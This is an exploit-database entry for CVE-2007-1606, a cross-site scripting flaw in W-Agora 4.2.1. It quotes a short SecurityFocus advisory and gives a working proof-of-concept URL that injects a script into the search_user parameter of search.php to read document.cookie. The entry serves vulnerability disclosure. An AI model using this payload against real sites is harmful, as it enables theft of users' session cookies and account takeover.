W-Agora 4.2.1 - search.php search_user Parameter XSS

2007-03-20T00:00:00
ID EDB-ID:29765
Type exploitdb
Reporter laurent gaffie
Modified 2007-03-20T00:00:00

Description

W-Agora 4.2.1 search.php search_user Parameter XSS. CVE-2007-1606 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/23057/info
 
w-Agora is prone to multiple input-validation vulnerabilities, including possible SQL-injection issues and multiple cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
 
w-Agora 4.2.1 is vulnerable. 

http://www.example.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&search_date=0&search_fields[body]=1&search_fields[ subject]=1&search_forum=hello_hello&search_mode=0&search_user='"><script>alert(document.cookie)</script>